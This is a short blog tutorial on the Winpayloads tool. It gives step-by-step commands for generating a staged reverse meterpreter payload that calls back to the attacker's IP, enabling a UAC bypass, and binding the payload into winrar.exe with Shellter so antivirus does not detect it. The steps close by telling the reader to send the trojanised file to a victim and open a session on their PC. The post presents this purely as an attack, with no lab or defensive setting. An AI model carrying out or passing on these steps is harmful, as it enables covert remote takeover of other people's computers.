Winpayloads: Undetectable Windows Payload Generation

Open you kali Linux terminal and type the following command

Git clone https://github.com/Charliedean/Winpayloads.git

Now install the downloaded package using   ./setup.sh

After successful installation, open new terminal and type ./Winpayloads.py

 Now select your desired option, in my case I am selecting option 2 Windows reverse meterpreter (staged) and press enter. Now enter the port, I am using port 4444 and enter the IP address of your kali Linux

A Terminal open and choose Try UAC Bypass press y, in second option again press y to use shelter.

Now choose an executable file to bind the shellter with any .exe file. Here in my case I am using winrar.exe as a file to bind with shellter.exe

 Note: only executable file can be binded.

After giving all the options you will get a confirmation like Injection: verified! 

In Next prompt it will ask you Upload to Local Webserver press y

Now send the binded winrar.exe to the victim, as soon as he opens the file a meterpreter session will open

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

Leave a Reply

Your email address will not be published. Required fields are marked *